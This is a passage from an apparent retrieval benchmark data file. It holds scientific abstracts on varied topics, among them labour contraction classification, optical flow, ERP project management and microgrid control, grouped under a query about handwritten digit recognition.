"text": "Childbirth is an intricate process which is marked by an increased cervical dilation rate caused due to steady increments in the frequency and strength of uterine contractions. The contractions may be characterized by its strength, duration and frequency (count) - which are monitored through Tocography. However, the procedure is prone to subjectivity and an automated approach for the classification of the contractions is needed. In this paper, we use three different Weighted K-Nearest Neighbor classifiers and Decision Trees to classify the contractions into three types: Mild, Moderate and Strong. Further, we note the fact that our training data consists of fewer samples of Contractions as compared to those of Non-contractions - resulting in “Class Imbalance”. Hence, we use the Synthetic Minority Oversampling Technique (SMOTE) in conjunction with the K-NN classifier and Decision Trees to alleviate the problems of the same. The ground truth for Tocography signals was established by a doctor having an experience of 36 years in Obstetrics and Gynaecology. The annotations are in three categories: Mild (33 samples), Moderate (64 samples) and Strong (96 samples), amounting to a total of 193 contractions whereas the number of Non-contraction samples was 1217. Decision Trees using SMOTE performed the best with accuracies of 95%, 98.25% and 100% for the aforementioned categories, respectively. The sensitivities achieved for the same are 96.67%, 96.52% and 100% whereas the specificities amount to 93.33%, 100% and 100%, respectively. Our method may be used to monitor the labour progress efficiently.",
"title": ""
},
{
"docid": "3a066516f52dec6150fcf4a8e081605f",
"text": "Writer: Julie Risbourg Title: Breaking the ‘glass ceiling’ Subtitle: Language: A Critical Discourse Analysis of how powerful businesswomen are portrayed in The Economist online English Pages: 52 Women still represent a minority in the executive world. Much research has been aimed at finding possible explanations concerning the underrepresentation of women in the male dominated executive sphere. The findings commonly suggest that a patriarchal society and the maintenance of gender stereotypes lead to inequalities and become obstacles for women to break the so-called ‘glass ceiling’. This thesis, however, aims to explore how businesswomen are represented once they have broken the glass ceiling and entered the executive world. Within the Forbes’ list of the 100 most powerful women of 2017, the two first businesswomen on the list were chosen, and their portrayals were analysed through articles published by The Economist online. The theoretical framework of this thesis includes Goffman’s framing theory and takes a cultural feminist perspective on exploring how the media outlet frames businesswomen Sheryl Sandberg and Mary Barra. The thesis also examines how these frames relate to the concepts of stereotyping, commonly used in the coverage of women in the media. More specifically, the study investigates whether negative stereotypes concerning their gender are present in the texts or if positive stereotypes such as idealisation are used to portray them. Those concepts are coupled with the theoretical aspect of the method, which is Critical Discourse Analysis. This method is chosen in order to explore the underlying meanings and messages The Economist chose to refer to these two businesswomen. This is done through the use of linguistic and visual tools, such as lexical choices, word connotations, nomination/functionalisation and gaze. The findings show that they were portrayed positively within a professional environment, and the publication celebrated their success and hard work. Moreover, the results also show that gender related traits were mentioned, showing a subjective representation, which is countered by their idealisation, via their presence in not only the executive world, but also having such high-working titles in male dominated industries.",
"title": ""
},
{
"docid": "0e002aae88332f8143e6f3a19c4c578b",
"text": "While attachment research has demonstrated that parents' internal working models of attachment relationships tend to be transmitted to their children, affecting children's developmental trajectories, this study specifically examines associations between adult attachment status and observable parent, child, and dyadic behaviors among children with autism and associated neurodevelopmental disorders of relating and communicating. The Adult Attachment Interview (AAI) was employed to derive parental working models of attachment relationships. The Functional Emotional Assessment Scale (FEAS) was used to determine the quality of relational and functional behaviors in parents and their children. The sample included parents and their 4- to 16-year-old children with autism and associated neurodevelopmental disorders. Hypothesized relationships between AAI classifications and FEAS scores were supported. Significant correlations were found between AAI classification and FEAS scores, indicating that children with autism spectrum disorders whose parents demonstrated secure attachment representations were better able to initiate and respond in two-way pre-symbolic gestural communication; organize two-way social problem-solving communication; and engage in imaginative thinking, symbolic play, and verbal communication. These findings lend support to the relevance of the parent's state of mind pertaining to attachment status to child and parent relational behavior in cases wherein the child has been diagnosed with autism or an associated neurodevelopmental disorder of relating and communicating. A model emerges from these findings of conceptualizing relationships between parental internal models of attachment relationships and parent-child relational and functional levels that may aid in differentiating interventions.",
"title": ""
},
{
"docid": "a23aa9d2a0a100e805e3c25399f4f361",
"text": "Cases of poisoning by oleander (Nerium oleander) were observed in several species, except in goats. This study aimed to evaluate the pathological effects of oleander in goats. The experimental design used three goats per group: the control group, which did not receive oleander and the experimental group, which received leaves of oleander (50 mg/kg/day) for six consecutive days. On the seventh day, goats received 110 mg/kg of oleander leaves four times at one-hourly interval. A last dose of 330 mg/kg of oleander leaves was given subsequently. After the last dose was administered, clinical signs such as apathy, colic, vocalizations, hyperpnea, polyuria, and moderate rumen distention were observed. Electrocardiogram revealed second-degree atrioventricular block. Death occurred on an average at 92 min after the last dosing. Microscopic evaluation revealed renal necrosis at convoluted and collector tubules and slight myocardial degeneration was observed by unequal staining of cardiomyocytes. Data suggest that goats appear to respond to oleander poisoning in a manner similar to other species.",
"title": ""
},
{
"docid": "58eebe0e55f038fea268b6a7a6960939",
"text": "The classic answer to what makes a decision good concerns outcomes. A good decision has high outcome benefits (it is worthwhile) and low outcome costs (it is worth it). I propose that, independent of outcomes or value from worth, people experience a regulatory fit when they use goal pursuit means that fit their regulatory orientation, and this regulatory fit increases the value of what they are doing. The following postulates of this value from fit proposal are examined: (a) People will be more inclined toward goal means that have higher regulatory fit, (b) people's motivation during goal pursuit will be stronger when regulatory fit is higher, (c) people's (prospective) feelings about a choice they might make will be more positive for a desirable choice and more negative for an undesirable choice when regulatory fit is higher, (d) people's (retrospective) evaluations of past decisions or goal pursuits will be more positive when regulatory fit was higher, and (e) people will assign higher value to an object that was chosen with higher regulatory fit. Studies testing each of these postulates support the value-from-fit proposal. How value from fit can enhance or diminish the value of goal pursuits and the quality of life itself is discussed.",
"title": ""
},
{
"docid": "66426e6c8623ececcfaa8a27c0d18d12",
"text": "Defining hope as a cognitive set that is composed of a reciprocally derived sense of successful (a) agency (goal-directed determination) and (b) pathways (planning of ways to meet goals), an individual-differences measure is developed. Studies demonstrate acceptable internal consistency and test-retest reliability, and the factor structure identifies the agency and pathways components of the Hope Scale. Convergent and discriminant validity are documented, along with evidence suggesting that Hope Scale scores augmented the prediction of goal-related activities and coping strategies beyond other self-report measures. Construct validational support is provided in regard to predicted goal-setting behaviors; moreover, the hypothesized goal appraisal processes that accompany the various levels of hope are corroborated.",
"title": ""
},
{
"docid": "68ad03bca3696f1163ba1d09ae1115e0",
"text": "Manually labeling datasets with object masks is extremely time consuming. In this work, we follow the idea of Polygon-RNN [4] to produce polygonal annotations of objects interactively using humans-in-the-loop. We introduce several important improvements to the model: 1) we design a new CNN encoder architecture, 2) show how to effectively train the model with Reinforcement Learning, and 3) significantly increase the output resolution using a Graph Neural Network, allowing the model to accurately annotate high-resolution objects in images. Extensive evaluation on the Cityscapes dataset [8] shows that our model, which we refer to as Polygon-RNN++, significantly outperforms the original model in both automatic (10% absolute and 16% relative improvement in mean IoU) and interactive modes (requiring 50% fewer clicks by annotators). We further analyze the cross-domain scenario in which our model is trained on one dataset, and used out of the box on datasets from varying domains. The results show that Polygon-RNN++ exhibits powerful generalization capabilities, achieving significant improvements over existing pixel-wise methods. Using simple online fine-tuning we further achieve a high reduction in annotation time for new datasets, moving a step closer towards an interactive annotation tool to be used in practice.",
"title": ""
},
{
"docid": "a5c67537b72e3cd184b43c0a0e7c96b2",
"text": "These notes give a short introduction to Gaussian mixture models (GMMs) and the Expectation-Maximization (EM) algorithm, first for the specific case of GMMs, and then more generally. These notes assume you’re familiar with basic probability and basic calculus. If you’re interested in the full derivation (Section 3), some familiarity with entropy and KL divergence is useful but not strictly required. The notation here is borrowed from Introduction to Probability by Bertsekas & Tsitsiklis: random variables are represented with capital letters, values they take are represented with lowercase letters, pX represents a probability distribution for random variable X, and pX(x) represents the probability of value x (according to pX). We’ll also use the shorthand notation X 1 to represent the sequence X1, X2, . . . , Xn, and similarly x n 1 to represent x1, x2, . . . , xn. These notes follow a development somewhat similar to the one in Pattern Recognition and Machine Learning by Bishop.",
"title": ""
},
{
"docid": "f4b424ae1defc67fb660e2fa300177eb",
"text": "The annual Satisfiability Modulo Theories Competition (SMT-COMP) was initiated in 2005 in order to stimulate the advance of state-of-the-art techniques and tools developed by the Satisfiability Modulo Theories (SMT) community. This paper summarizes the first six editions of the competition. We present the evolution of the competition’s organization and rules, show how the state of the art has improved over the course of the competition, and discuss the impact SMT-COMP has had on the SMT community and beyond. Additionally, we include an exhaustive list of all competitors, and present experimental results showing significant improvement in SMT solvers during these six years. Finally, we analyze to what extent the initial goals of the competition have been achieved, and sketch future directions for the competition.",
"title": ""
},
{
"docid": "a81b999f495637ba3e12799d727d872d",
"text": "The inversion of remote sensing images is crucial for soil moisture mapping in precision agriculture. However, the large size of remote sensing images complicates their management. Therefore, this study proposes a remote sensing observation sharing method based on cloud computing (ROSCC) to enhance remote sensing observation storage, processing, and service capability. The ROSCC framework consists of a cloud computing-enabled sensor observation service, web processing service tier, and a distributed database tier. Using MongoDB as the distributed database and Apache Hadoop as the cloud computing service, this study achieves a high-throughput method for remote sensing observation storage and distribution. The map, reduced algorithms and the table structure design in distributed databases are then explained. Along the Yangtze River, the longest river in China, Hubei Province was selected as the study area to test the proposed framework. Using GF-1 as a data source, an experiment was performed to enhance earth observation data (EOD) storage and achieve large-scale soil moisture mapping. The proposed ROSCC can be applied to enhance EOD sharing in cloud computing context, so as to achieve soil moisture mapping via the modified perpendicular drought index in an efficient way to better serve precision agriculture.",
"title": ""
},
{
"docid": "937644ac8b97de476653e4b8aaa924ac",
"text": "In this paper, a generalized discontinuous pulsewidth modulation (GDPWM) method with superior high modulation operating range performance characteristics is developed. An algorithm which employs the conventional space-vector PWM method in the low modulation range, and the GDPWM method in the high modulation range, is established. As a result, the current waveform quality, switching losses, voltage linearity range, and the overmodulation region performance of a PWM voltage-source inverter (PWM-VSI) drive are on-line optimized, as opposed to conventional modulators with fixed characteristics. Due to its compactness, simplicity, and superior performance, the algorithm is suitable for most high-performance PWM-VSI drive applications. This paper provides detailed performance analysis of the method and compares it to the other methods. The experimental results verify the superiority of this algorithm to the conventional PWM methods.",
"title": ""
},
{
"docid": "c049c79253bd9575774c60b459af4505",
"text": "Ginkgo has been a mainstay of traditional Chinese medicine for more than 5000 years. Perhaps the ancient Taoist Monks had some vision of the future of Ginkgo as a brain and memory tonic when they planted it ceremonially in places of honor in their monasteries. They felt that this two lobed, fan-shaped leaf (biloba) represented the two phases of Yin and Yang in Taoist Philosophy. Ginkgo was planted to portray wisdom, centeredness and a meditative state.",
"title": ""
},
{
"docid": "6f609fef5fd93e776fd7d43ed91fd4a8",
"text": "Wandering is among the most frequent, problematic, and dangerous behaviors for elders with dementia. Frequent wanderers likely suffer falls and fractures, which affect the safety and quality of their lives. In order to monitor outdoor wandering of elderly people with dementia, this paper proposes a real-time method for wandering detection based on individuals' GPS traces. By representing wandering traces as loops, the problem of wandering detection is transformed into detecting loops in elders' mobility trajectories. Specifically, the raw GPS data is first preprocessed to remove noisy and crowded points by performing an online mean shift clustering. A novel method called θ_WD is then presented that is able to detect loop-like traces on the fly. The experimental results on the GPS datasets of several elders have show that the θ_WD method is effective and efficient in detecting wandering behaviors, in terms of detection performance (AUC > 0.99, and 90% detection rate with less than 5 % of the false alarm rate), as well as time complexity.",
"title": ""
},
{
"docid": "df6c7f13814178d7b34703757899d6b1",
"text": "Regression testing of natural language systems is problematic for two main reasons: component input and output is complex, and system behaviour is context-dependent. We have developed a generic approach which solves both of these issues. We describe our regression tool, CONTEST, which supports context-dependent testing of dialogue system components, and discuss the regression test sets we developed, designed to effectively isolate components from changes and problems earlier in the pipeline. We believe that the same approach can be used in regression testing for other dialogue systems, as well as in testing any complex NLP system containing multiple components.",
"title": ""
},
{
"docid": "ce56d594c7ee2a935b2b8b243d892070",
"text": "We introduce a skill discovery method for reinforcement learning in continuous domains that constructs chains of skills leading to an end-of-task reward. We demonstrate experimentally that it creates appropriate skills and achieves performance benefits in a challenging continuous domain.",
"title": ""
},
{
"docid": "902e6d047605a426ae9bebc3f9ddf139",
"text": "Learning based approaches have not yet achieved their full potential in optical flow estimation, where their performance still trails heuristic approaches. In this paper, we present a CNN based patch matching approach for optical flow estimation. An important contribution of our approach is a novel thresholded loss for Siamese networks. We demonstrate that our loss performs clearly better than existing losses. It also allows to speed up training by a factor of 2 in our tests. Furthermore, we present a novel way for calculating CNN based features for different image scales, which performs better than existing methods. We also discuss new ways of evaluating the robustness of trained features for the application of patch matching for optical flow. An interesting discovery in our paper is that low-pass filtering of feature maps can increase the robustness of features created by CNNs. We proved the competitive performance of our approach by submitting it to the KITTI 2012, KITTI 2015 and MPI-Sintel evaluation portals where we obtained state-of-the-art results on all three datasets.",
"title": ""
},
{
"docid": "ae2e62bd0e51299661822a85bd690cd1",
"text": "Today medical services have come a long way to treat patients with various diseases. Among the most lethal one is the heart disease problem which cannot be seen with a naked eye and comes instantly when its limitations are reached. Today diagnosing patients correctly and administering effective treatments have become quite a challenge. Poor clinical decisions may end to patient death and which cannot be afforded by the hospital as it loses its reputation. The cost to treat a patient with a heart problem is quite high and not affordable by every patient. To achieve a correct and cost effective treatment computer-based information and/or decision support Systems can be developed to do the task. Most hospitals today use some sort of hospital information systems to manage their healthcare or patient data. These systems typically generate huge amounts of data which take the form of numbers, text, charts and images. Unfortunately, these data are rarely used to support clinical decision making. There is a wealth of hidden information in these data that is largely untapped. This raises an important question: \" How can we turn data into useful information that can enable healthcare practitioners to make intelligent clinical decisions? \" So there is need of developing a master's project which will help practitioners predict the heart disease before it occurs.The diagnosis of diseases is a vital and intricate job in medicine. The recognition of heart disease from diverse features or signs is a multi-layered problem that is not free from false assumptions and is frequently accompanied by impulsive effects. Thus the attempt to exploit knowledge and experience of several specialists and clinical screening data of patients composed in databases to assist the diagnosis procedure is regarded as a valuable option.",
"title": ""
},
{
"docid": "29b0d0737493b50cbcec8c4cecc76f5b",
"text": "The author first provides an overview of computational intelligence and AI in games. Then he describes the new IEEE Transactions, which will publish archival quality original papers in all aspects of computational intelligence and AI related to all types of games. To name some examples, these include computer and video games, board games, card games, mathematical games, games that model economies or societies, serious games with educational and training applications, and games involving physical objects such as robot football and robotic car racing. Emphasis will also be placed on the use of these methods to improve performance in, and understanding of, the dynamics of games, as well as gaining insight into the properties of the methods as applied to games. It will also include using games as a platform for building intelligent embedded agents for real-world applications. The journal builds on a scientific community that has already been active in recent years with the development of new conference series such as the IEEE Symposium on Computational Intelligence in Games (CIG) and Artificial Intelligence and Interactive Digital Entertainment (AIIDE), as well as special issues on games in journals such as the IEEE Transactions on Evolutionary Computation. When setting up the journal, a decision was made to include both artificial intelligence (AI) and computational intelligence (CI) in the title. AI seeks to simulate intelligent behavior in any way that can be programmed effectively. Some see the field of AI as being all-inclusive, while others argue that there is nothing artificial about real intelligence as exhibited by higher mammals.",
"title": ""
},
{
"docid": "9d5ca4c756b63c60f6a9d6308df63ea3",
"text": "This paper presents recent advances in the project: development of a convertible unmanned aerial vehicle (UAV). This aircraft is able to change its flight configuration from hover to level flight and vice versa by means of a transition maneuver, while maintaining the aircraft in flight. For this purpose a nonlinear control strategy based on Lyapunov design is given. Numerical results are presented showing the effectiveness of the proposed approach.",
"title": ""
}
] | scidocsrr |
b946bcca0178da0ccae0e2a586f1c7c7 | Handwritten digit recognition using biologically inspired features | [
{
"docid": "be369e7935f5a56b0c5ac671c7ec315b",
"text": "Memory-based classification algorithms such as radial basis functions or K-nearest neighbors typically rely on simple distances (Euclidean, dot product ... ), which are not particularly meaningful on pattern vectors. More complex, better suited distance measures are often expensive and rather ad-hoc (elastic matching, deformable templates). We propose a new distance measure which (a) can be made locally invariant to any set of transformations of the input and (b) can be computed efficiently. We tested the method on large handwritten character databases provided by the Post Office and the NIST. Using invariances with respect to translation, rotation, scaling, shearing and line thickness, the method consistently outperformed all other systems tested on the same databases.",
"title": ""
},
{
"docid": "2ce4e4d5026114739adfeee7626e2aae",
"text": "-A neural network model for visual pattern recognition, called the \"neocognitron, \"' was previously proposed by the author In this paper, we discuss the mechanism of the model in detail. In order to demonstrate the ability of the neocognitron, we also discuss a pattern-recognition system which works with the mechanism of the neocognitron. The system has been implemented on a minicomputer and has been trained to recognize handwritten numerals. The neocognitron is a hierarchical network consisting of many layers of cells, and has variable connections between the cells in adjoining layers. It can acquire the ability to recognize patterns by learning, and can be trained to recognize any set of patterns. After finishing the process of learning, pattern recognition is performed on the basis of similarity in shape between patterns, and is not affected by deformation, nor by changes in size, nor by shifts in the position of the input patterns. In the hierarchical network of the neocognitron, local features of the input pattern are extracted by the cells of a lower stage, and they are gradually integrated into more global features. Finally, each cell of the highest stage integrates all the information of the input pattern, and responds only to one specific pattern. Thus, the response of the cells of the highest stage shows the final result of the pattern-recognition of the network. During this process of extracting and integrating features, errors in the relative position of local features are gradually tolerated. The operation of tolerating positional error a little at a time at each stage, rather than all in one step, plays an important role in endowing the network with an ability to recognize even distorted patterns.",
"title": ""
}
] | [
{
"docid": "3028de6940fb7a5af5320c506946edfc",
"text": "Metaphor is ubiquitous in text, even in highly technical text. Correct inference about textual entailment requires computers to distinguish the literal and metaphorical senses of a word. Past work has treated this problem as a classical word sense disambiguation task. In this paper, we take a new approach, based on research in cognitive linguistics that views metaphor as a method for transferring knowledge from a familiar, well-understood, or concrete domain to an unfamiliar, less understood, or more abstract domain. This view leads to the hypothesis that metaphorical word usage is correlated with the degree of abstractness of the word’s context. We introduce an algorithm that uses this hypothesis to classify a word sense in a given context as either literal (denotative) or metaphorical (connotative). We evaluate this algorithm with a set of adjectivenoun phrases (e.g., in dark comedy , the adjective dark is used metaphorically; in dark hair, it is used literally) and with the TroFi (Trope Finder) Example Base of literal and nonliteral usage for fifty verbs. We achieve state-of-theart performance on both datasets.",
"title": ""
},
{
"docid": "495143978d38979b64c3556a77740979",
"text": "We address the practical problems of estimating the information relations that characterize large networks. Building on methods developed for analysis of the neural code, we show that reliable estimates of mutual information can be obtained with manageable computational effort. The same methods allow estimation of higher order, multi–information terms. These ideas are illustrated by analyses of gene expression, financial markets, and consumer preferences. In each case, information theoretic measures correlate with independent, intuitive measures of the underlying structures in the system.",
"title": ""
},
{
"docid": "55a37995369fe4f8ddb446d83ac0cecf",
"text": "With the continued proliferation of smart mobile devices, Quick Response (QR) code has become one of the most-used types of two-dimensional code in the world. Aiming at beautifying the visual-unpleasant appearance of QR codes, existing works have developed a series of techniques. However, these works still leave much to be desired, such as personalization, artistry, and robustness. To address these issues, in this paper, we propose a novel type of aesthetic QR codes, SEE (Stylize aEsthEtic) QR code, and a three-stage approach to automatically produce such robust style-oriented codes. Specifically, in the first stage, we propose a method to generate an optimized baseline aesthetic QR code, which reduces the visual contrast between the noise-like black/white modules and the blended image. In the second stage, to obtain art style QR code, we tailor an appropriate neural style transformation network to endow the baseline aesthetic QR code with artistic elements. In the third stage, we design an error-correction mechanism by balancing two competing terms, visual quality and readability, to ensure the performance robust. Extensive experiments demonstrate that SEE QR code has high quality in terms of both visual appearance and robustness, and also offers a greater variety of personalized choices to users.",
"title": ""
},
{
"docid": "197ad51ef4b33978903a2ece4a64c350",
"text": "It has been suggested that Brain-Computer Interfaces (BCI) may one day be suitable for controlling a neuroprosthesis. For closed-loop operation of BCI, a tactile feedback channel that is compatible with neuroprosthetic applications is desired. Operation of an EEG-based BCI using only vibrotactile feedback, a commonly used method to convey haptic senses of contact and pressure, is demonstrated with a high level of accuracy. A Mu-rhythm based BCI using a motor imagery paradigm was used to control the position of a virtual cursor. The cursor position was shown visually as well as transmitted haptically by modulating the intensity of a vibrotactile stimulus to the upper limb. A total of six subjects operated the BCI in a two-stage targeting task, receiving only vibrotactile biofeedback of performance. The location of the vibration was also systematically varied between the left and right arms to investigate location-dependent effects on performance. Subjects are able to control the BCI using only vibrotactile feedback with an average accuracy of 56% and as high as 72%. These accuracies are significantly higher than the 15% predicted by random chance if the subject had no voluntary control of their Mu-rhythm. The results of this study demonstrate that vibrotactile feedback is an effective biofeedback modality to operate a BCI using motor imagery. In addition, the study shows that placement of the vibrotactile stimulation on the biceps ipsilateral or contralateral to the motor imagery introduces a significant bias in the BCI accuracy. This bias is consistent with a drop in performance generated by stimulation of the contralateral limb. Users demonstrated the capability to overcome this bias with training.",
"title": ""
},
{
"docid": "cc8e52fdb69a9c9f3111287905f02bfc",
"text": "We present a new methodology for exploring and analyzing navigation patterns on a web site. The patterns that can be analyzed consist of sequences of URL categories traversed by users. In our approach, we first partition site users into clusters such that users with similar navigation paths through the site are placed into the same cluster. Then, for each cluster, we display these paths for users within that cluster. The clustering approach we employ is model-based (as opposed to distance-based) and partitions users according to the order in which they request web pages. In particular, we cluster users by learning a mixture of first-order Markov models using the Expectation-Maximization algorithm. The runtime of our algorithm scales linearly with the number of clusters and with the size of the data; and our implementation easily handles hundreds of thousands of user sessions in memory. In the paper, we describe the details of our method and a visualization tool based on it called WebCANVAS. We illustrate the use of our approach on user-traffic data from msnbc.com.",
"title": ""
},
{
"docid": "e48e208c01fb6f8918aec8aa68e2ad86",
"text": "We propose a camera-based assistive text reading framework to help blind persons read text labels and product packaging from hand-held objects in their daily lives. To isolate the object from cluttered backgrounds or other surrounding objects in the camera view, we first propose an efficient and effective motion-based method to define a region of interest (ROI) in the video by asking the user to shake the object. This method extracts moving object region by a mixture-of-Gaussians-based background subtraction method. In the extracted ROI, text localization and recognition are conducted to acquire text information. To automatically localize the text regions from the object ROI, we propose a novel text localization algorithm by learning gradient features of stroke orientations and distributions of edge pixels in an Adaboost model. Text characters in the localized text regions are then binarized and recognized by off-the-shelf optical character recognition software. The recognized text codes are output to blind users in speech. Performance of the proposed text localization algorithm is quantitatively evaluated on ICDAR-2003 and ICDAR-2011 Robust Reading Datasets. Experimental results demonstrate that our algorithm achieves the state of the arts. The proof-of-concept prototype is also evaluated on a dataset collected using ten blind persons to evaluate the effectiveness of the system's hardware. We explore user interface issues and assess robustness of the algorithm in extracting and reading text from different objects with complex backgrounds.",
"title": ""
},
{
"docid": "9f32b1e95e163c96ebccb2596a2edb8d",
"text": "This paper is devoted to the control of a cable driven redundant parallel manipulator, which is a challenging problem due the optimal resolution of its inherent redundancy. Additionally to complicated forward kinematics, having a wide workspace makes it difficult to directly measure the pose of the end-effector. The goal of the controller is trajectory tracking in a large and singular free workspace, and to guarantee that the cables are always under tension. A control topology is proposed in this paper which is capable to fulfill the stringent positioning requirements for these type of manipulators. Closed-loop performance of various control topologies are compared by simulation of the closed-loop dynamics of the KNTU CDRPM, while the equations of parallel manipulator dynamics are implicit in structure and only special integration routines can be used for their integration. It is shown that the proposed joint space controller is capable to satisfy the required tracking performance, despite the inherent limitation of task space pose measurement.",
"title": ""
},
{
"docid": "ba5a2c1e189d412568fb768c90e9f04e",
"text": "As robots become more ubiquitous, it is increasingly important for untrained users to be able to interact with them intuitively. In this work, we investigate how people refer to objects in the world during relatively unstructured communication with robots. We collect a corpus of deictic interactions from users describing objects, which we use to train language and gesture models that allow our robot to determine what objects are being indicated. We introduce a temporal extension to stateof-the-art hierarchical matching pursuit features to support gesture understanding, and demonstrate that combining multiple communication modalities more effectively capture user intent than relying on a single type of input. Finally, we present initial interactions with a robot that uses the learned models to follow commands.",
"title": ""
},
{
"docid": "24fb623bb06a0df123aecd1c03e6a0e9",
"text": "Information technology (IT) projects are susceptible to changes in the business environment, and the increasing velocity of change in global business is challenging the management of enterprise systems such as enterprise resource planning (ERP). At the same time, system success depends on the rigor of the project management processes. scope creep, poor risk management, inadequate allocation of human resources over time, and vendor management are some common problems associated with the implementation of an enterprise system. These issues pose threats to the success of a large-scale software project such as ERP. This research adopts a case study approach to examine how poor project management can imperil the implementation of an ERP system. Having learned the lessons from the failure of its first ERP implementation, the company in this case reengineered its project management practices to successfully carry out its second ERP implementation. Many critical project management factors contributed to the failure and success of this company's ERP system. This study explores and identifies critical elements of project management that contributed to the success of the second ERP implementation. For those organizations adopting ERP, the findings provide a roadmap to follow in order to avoid making critical, but often underestimated, project management mistakes.",
"title": ""
},
{
"docid": "81c90998c5e456be34617e702dbfa4f5",
"text": "In this paper, a new unsupervised learning algorithm, namely Nonnegative Discriminative Feature Selection (NDFS), is proposed. To exploit the discriminative information in unsupervised scenarios, we perform spectral clustering to learn the cluster labels of the input samples, during which the feature selection is performed simultaneously. The joint learning of the cluster labels and feature selection matrix enables NDFS to select the most discriminative features. To learn more accurate cluster labels, a nonnegative constraint is explicitly imposed to the class indicators. To reduce the redundant or even noisy features, `2,1-norm minimization constraint is added into the objective function, which guarantees the feature selection matrix sparse in rows. Our algorithm exploits the discriminative information and feature correlation simultaneously to select a better feature subset. A simple yet efficient iterative algorithm is designed to optimize the proposed objective function. Experimental results on different real world datasets demonstrate the encouraging performance of our algorithm over the state-of-the-arts. Introduction The dimension of data is often very high in many domains (Jain and Zongker 1997; Guyon and Elisseeff 2003), such as image and video understanding (Wang et al. 2009a; 2009b), and bio-informatics. In practice, not all the features are important and discriminative, since most of them are often correlated or redundant to each other, and sometimes noisy (Duda, Hart, and Stork 2001; Liu, Wu, and Zhang 2011). These features may result in adverse effects in some learning tasks, such as over-fitting, low efficiency and poor performance (Liu, Wu, and Zhang 2011). Consequently, it is necessary to reduce dimensionality, which can be achieved by feature selection or transformation to a low dimensional space. In this paper, we focus on feature selection, which is to choose discriminative features by eliminating the ones with little or no predictive information based on certain criteria. Many feature selection algorithms have been proposed, which can be classified into three main families: filter, wrapper, and embedded methods. The filter methods (Duda, Hart, Copyright c © 2012, Association for the Advancement of Artificial Intelligence (www.aaai.org). All rights reserved. and Stork 2001; He, Cai, and Niyogi 2005; Zhao and Liu 2007; Masaeli, Fung, and Dy 2010; Liu, Wu, and Zhang 2011; Yang et al. 2011a) use statistical properties of the features to filter out poorly informative ones. They are usually performed before applying classification algorithms. They select a subset of features only based on the intrinsic properties of the data. In the wrapper approaches (Guyon and Elisseeff 2003; Rakotomamonjy 2003), feature selection is “wrapped” in a learning algorithm and the classification performance of features is taken as the evaluation criterion. Embedded methods (Vapnik 1998; Zhu et al. 2003) perform feature selection in the process of model construction. In contrast with filter methods, wrapper and embedded methods are tightly coupled with in-built classifiers, which causes that they are less generality and computationally expensive. In this paper, we focus on the filter feature selection algorithm. Because of the importance of discriminative information in data analysis, it is beneficial to exploit discriminative information for feature selection, which is usually encoded in labels. However, how to select discriminative features in unsupervised scenarios is a significant but hard task due to the lack of labels. In light of this, we propose a novel unsupervised feature selection algorithm, namely Nonnegative Discriminative Feature Selection (NDFS), in this paper. We perform spectral clustering and feature selection simultaneously to select the discriminative features for unsupervised learning. The cluster label indicators are obtained by spectral clustering to guide the feature selection procedure. Different from most of the previous spectral clustering algorithms (Shi and Malik 2000; Yu and Shi 2003), we explicitly impose a nonnegative constraint into the objective function, which is natural and reasonable as discussed later in this paper. With nonnegative and orthogonality constraints, the learned cluster indicators are much closer to the ideal results and can be readily utilized to obtain cluster labels. Our method exploits the discriminative information and feature correlation in a joint framework. For the sake of feature selection, the feature selection matrix is constrained to be sparse in rows, which is formulated as `2,1-norm minimization term. To solve the proposed problem, a simple yet effective iterative algorithm is proposed. Extensive experiments are conducted on different datasets, which show that the proposed approach outperforms the state-of-the-arts in different applications. Proceedings of the Twenty-Sixth AAAI Conference on Artificial Intelligence",
"title": ""
},
{
"docid": "7b4d904c2a0d237614e9367df69550b3",
"text": "Microgrids are a new concept for future energy distribution systems that enable renewable energy integration and improved energy management capability. Microgrids consist of multiple distributed generators (DGs) that are usually integrated via power electronic inverters. In order to enhance power quality and power distribution reliability, microgrids need to operate in both grid-connected and island modes. Consequently, microgrids can suffer performance degradation as the operating conditions vary due to abrupt mode changes and variations in bus voltages and system frequency. This paper presents controller design and optimization methods to stably coordinate multiple inverter-interfaced DGs and to robustly control individual interface inverters against voltage and frequency disturbances. Droop-control concepts are used as system-level multiple DG coordination controllers, and control theory is applied to device-level inverter controllers. Optimal control parameters are obtained by particle-swarm-optimization algorithms, and the control performance is verified via simulation studies.",
"title": ""
},
{
"docid": "63cf9ef326bbe39aa1ecc86b6b1cb0ce",
"text": "Drug delivery systems (DDS) have become important tools for the specific delivery of a large number of drug molecules. Since their discovery in the 1960s liposomes were recognized as models to study biological membranes and as versatile DDS of both hydrophilic and lipophilic molecules. Liposomes--nanosized unilamellar phospholipid bilayer vesicles--undoubtedly represent the most extensively studied and advanced drug delivery vehicles. After a long period of research and development efforts, liposome-formulated drugs have now entered the clinics to treat cancer and systemic or local fungal infections, mainly because they are biologically inert and biocompatible and practically do not cause unwanted toxic or antigenic reactions. A novel, up-coming and promising therapy approach for the treatment of solid tumors is the depletion of macrophages, particularly tumor associated macrophages with bisphosphonate-containing liposomes. In the advent of the use of genetic material as therapeutic molecules the development of delivery systems to target such novel drug molecules to cells or to target organs becomes increasingly important. Liposomes, in particular lipid-DNA complexes termed lipoplexes, compete successfully with viral gene transfection systems in this field of application. Future DDS will mostly be based on protein, peptide and DNA therapeutics and their next generation analogs and derivatives. Due to their versatility and vast body of known properties liposome-based formulations will continue to occupy a leading role among the large selection of emerging DDS.",
"title": ""
},
{
"docid": "03c03dcdc15028417e699649291a2317",
"text": "The unique characteristics of origami to realize 3-D shape from 2-D patterns have been fascinating many researchers and engineers. This paper presents a fabrication of origami patterned fabric wheels that can deform and change the radius of the wheels. PVC segments are enclosed in the fabrics to build a tough and foldable structure. A special cable driven mechanism was designed to allow the wheels to deform while rotating. A mobile robot with two origami wheels has been built and tested to show that it can deform its wheels to overcome various obstacles.",
"title": ""
},
{
"docid": "6e17362c0e6a4d3190b3c8b0a11d6844",
